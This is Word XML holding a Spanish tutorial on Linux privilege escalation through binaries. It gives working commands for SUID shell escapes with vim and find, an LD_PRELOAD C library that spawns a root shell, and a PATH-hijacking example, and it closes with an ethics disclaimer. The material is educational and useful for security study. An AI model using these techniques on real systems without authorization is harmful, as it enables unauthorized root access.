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4BB" w:rsidRPr="009B74BB" w:rsidRDefault="009B74BB" w:rsidP="009B74BB">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B74BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t xml:space="preserve">La escalada de privilegios utilizando binarios se basa en encontrar programas instalados en un sistema que tienen permisos elevados (como </w:t>
      </w:r>
      <w:r w:rsidRPr="009B74BB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r w:rsidRPr="009B74BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>) y explotar estos binarios para obtener mayores privilegios. Aquí hay una descripción general de cómo funciona y algunos métodos comunes para lograrlo:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B74BB" w:rsidRPr="009B74BB" w:rsidRDefault="009B74BB" w:rsidP="009B74B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9B74BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>1. Binarios SUID/SGID</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B74BB" w:rsidRPr="009B74BB" w:rsidRDefault="009B74BB" w:rsidP="009B74BB">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B74BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t xml:space="preserve">Los binarios SUID (Set User ID) y SGID (Set Group ID) son ejecutables que se ejecutan con los permisos del propietario del archivo, no con los permisos del usuario que los ejecuta. Si un binario SUID es propiedad del usuario </w:t>
      </w:r>
      <w:r w:rsidRPr="009B74BB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r w:rsidRPr="009B74BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t xml:space="preserve">, se ejecutará con permisos de </w:t>
      </w:r>
      <w:r w:rsidRPr="009B74BB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r w:rsidRPr="009B74BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>, lo que puede llevar a una escalada de privilegios si se explota correctamente.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B74BB" w:rsidRPr="009B74BB" w:rsidRDefault="009B74BB" w:rsidP="009B74BB">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9B74BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>Identificar binarios SUID/SGID</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bash</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Copy code</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 Buscar binarios SUID</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find / -perm -4000 -type f 2&gt;/dev/null</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 Buscar binarios SGID</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find / -perm -2000 -type f 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B74BB" w:rsidRPr="009B74BB" w:rsidRDefault="009B74BB" w:rsidP="009B74BB">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9B74BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>Explotación de binarios SUID</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B74BB" w:rsidRPr="009B74BB" w:rsidRDefault="009B74BB" w:rsidP="009B74BB">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B74BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t xml:space="preserve">Algunos binarios SUID pueden ser explotados para obtener una shell con privilegios elevados. Por ejemplo, si </w:t>
      </w:r>
      <w:r w:rsidRPr="009B74BB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>vim</w:t>
      </w:r>
      <w:r w:rsidRPr="009B74BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t xml:space="preserve"> es un binario SUID, puedes obtener una shell de </w:t>
      </w:r>
      <w:r w:rsidRPr="009B74BB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r w:rsidRPr="009B74BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t xml:space="preserve"> de la siguiente manera:</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bash</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Copy code</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 Ejecutar vim y obtener una shell</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vim -c '!sh'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B74BB" w:rsidRPr="009B74BB" w:rsidRDefault="009B74BB" w:rsidP="009B74B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9B74BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>2. GTFOBins</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B74BB" w:rsidRPr="009B74BB" w:rsidRDefault="009B74BB" w:rsidP="009B74BB">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B74BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>GTFOBins es una colección de binarios Unix que pueden ser usados para bypass de medidas de seguridad y escalada de privilegios. Aquí se pueden encontrar ejemplos de cómo usar varios binarios para elevar privilegios.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B74BB" w:rsidRPr="009B74BB" w:rsidRDefault="009B74BB" w:rsidP="009B74BB">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9B74BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t xml:space="preserve">Ejemplo con </w:t>
      </w:r>
      <w:r w:rsidRPr="009B74BB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>find</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B74BB" w:rsidRPr="009B74BB" w:rsidRDefault="009B74BB" w:rsidP="009B74BB">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B74BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t xml:space="preserve">Si </w:t>
      </w:r>
      <w:r w:rsidRPr="009B74BB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>find</w:t>
      </w:r>
      <w:r w:rsidRPr="009B74BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t xml:space="preserve"> es un binario SUID:</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bash</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Copy code</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 Obtener una shell con find</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find . -exec /bin/sh \; -quit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B74BB" w:rsidRPr="009B74BB" w:rsidRDefault="009B74BB" w:rsidP="009B74B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9B74BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>3. Binarios con permisos incorrectos</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B74BB" w:rsidRPr="009B74BB" w:rsidRDefault="009B74BB" w:rsidP="009B74BB">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B74BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>A veces, los binarios pueden tener permisos incorrectos que permiten a un usuario sin privilegios modificarlos. Si un usuario puede modificar un binario que se ejecuta con permisos elevados, puede reemplazarlo con una versión maliciosa.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B74BB" w:rsidRPr="009B74BB" w:rsidRDefault="009B74BB" w:rsidP="009B74BB">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9B74BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>Identificar binarios con permisos incorrectos</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bash</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Copy code</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 Buscar binarios con permisos de escritura para otros usuarios</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find / -type f -perm -o+w 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B74BB" w:rsidRPr="009B74BB" w:rsidRDefault="009B74BB" w:rsidP="009B74B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9B74BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>4. LD_PRELOAD y LD_LIBRARY_PATH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B74BB" w:rsidRPr="009B74BB" w:rsidRDefault="009B74BB" w:rsidP="009B74BB">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B74BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t xml:space="preserve">Algunos programas cargan bibliotecas dinámicas cuando se ejecutan. Puedes aprovechar esto para cargar tu propia biblioteca maliciosa si puedes establecer las variables de entorno </w:t>
      </w:r>
      <w:r w:rsidRPr="009B74BB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>LD_PRELOAD</w:t>
      </w:r>
      <w:r w:rsidRPr="009B74BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t xml:space="preserve"> o </w:t>
      </w:r>
      <w:r w:rsidRPr="009B74BB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>LD_LIBRARY_PATH</w:t>
      </w:r>
      <w:r w:rsidRPr="009B74BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B74BB" w:rsidRPr="009B74BB" w:rsidRDefault="009B74BB" w:rsidP="009B74BB">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9B74BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>Ejemplo de uso de LD_PRELOAD</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c</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Copy code</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 Crea una biblioteca maliciosa en C</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#include &lt;stdio.h&gt;</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#include &lt;sys/types.h&gt;</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#include &lt;stdlib.h&gt;</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void _init() {</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 xml:space="preserve">    unsetenv("LD_PRELOAD");</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 xml:space="preserve">    setgid(0);</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 xml:space="preserve">    setuid(0);</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 xml:space="preserve">    system("/bin/sh");</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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B74BB" w:rsidRPr="009B74BB" w:rsidRDefault="009B74BB" w:rsidP="009B74BB">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B74BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>Compila esta biblioteca:</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bash</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Copy code</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gcc -fPIC -shared -o evil.so evil.c -nostartfiles</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B74BB" w:rsidRPr="009B74BB" w:rsidRDefault="009B74BB" w:rsidP="009B74BB">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B74BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t xml:space="preserve">Luego, ejecuta el binario vulnerable con la variable </w:t>
      </w:r>
      <w:r w:rsidRPr="009B74BB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>LD_PRELOAD</w:t>
      </w:r>
      <w:r w:rsidRPr="009B74BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t xml:space="preserve"> establecida a tu biblioteca maliciosa:</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bash</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Copy code</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LD_PRELOAD=./evil.so /bin/vulnerable_binary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B74BB" w:rsidRPr="009B74BB" w:rsidRDefault="009B74BB" w:rsidP="009B74B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9B74BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>5. PATH Hijacking</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B74BB" w:rsidRPr="009B74BB" w:rsidRDefault="009B74BB" w:rsidP="009B74BB">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B74BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Algunos scripts o binarios pueden ejecutar otros programas sin especificar su ruta completa, confiando en que están en el </w:t>
      </w:r>
      <w:r w:rsidRPr="009B74BB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>PATH</w:t>
      </w:r>
      <w:r w:rsidRPr="009B74BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t xml:space="preserve">. Si puedes modificar el </w:t>
      </w:r>
      <w:r w:rsidRPr="009B74BB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>PATH</w:t>
      </w:r>
      <w:r w:rsidRPr="009B74BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t xml:space="preserve"> para apuntar a un directorio controlado por ti, puedes poner tus propios binarios maliciosos allí.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B74BB" w:rsidRPr="009B74BB" w:rsidRDefault="009B74BB" w:rsidP="009B74BB">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9B74BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>Ejemplo de PATH Hijacking</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bash</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Copy code</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 Crear un binario malicioso</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echo '/bin/sh' &gt; /tmp/ls</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chmod +x /tmp/ls</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 Modificar el PATH para incluir /tmp al principio</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export PATH=/tmp:$PATH</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 Ejecutar el script vulnerable que usa `ls`</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B74BB" w:rsidRPr="009B74BB" w:rsidRDefault="009B74BB" w:rsidP="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B74BB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>/path/to/vulnerable_script</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B74BB" w:rsidRPr="009B74BB" w:rsidRDefault="009B74BB" w:rsidP="009B74B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9B74BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>Conclusión</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B74BB" w:rsidRPr="009B74BB" w:rsidRDefault="009B74BB" w:rsidP="009B74BB">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B74BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>Estos son solo algunos ejemplos de cómo puedes realizar una escalada de privilegios utilizando binarios en sistemas Unix/Linux. Es fundamental recordar que estas técnicas deben ser utilizadas exclusivamente en entornos de pruebas controlados y con permisos adecuados. La práctica ética y legal es esencial en el campo de la ciberseguridad.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB2342" w:rsidRDefault="009B74BB">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642"/>
    <w:rsid w:val="00075EE0"/>
    <w:rsid w:val="009B74BB"/>
    <w:rsid w:val="00E001F3"/>
    <w:rsid w:val="00F9264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9B74BB"/>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9B74BB"/>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B74BB"/>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9B74BB"/>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9B74B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9B74BB"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Textoennegrita">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="009B74BB"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTMLconformatoprevio">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HTMLconformatoprevioCar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="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9B74BB"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="es-CL"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-comment">
    <w:name w:val="hljs-comment"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
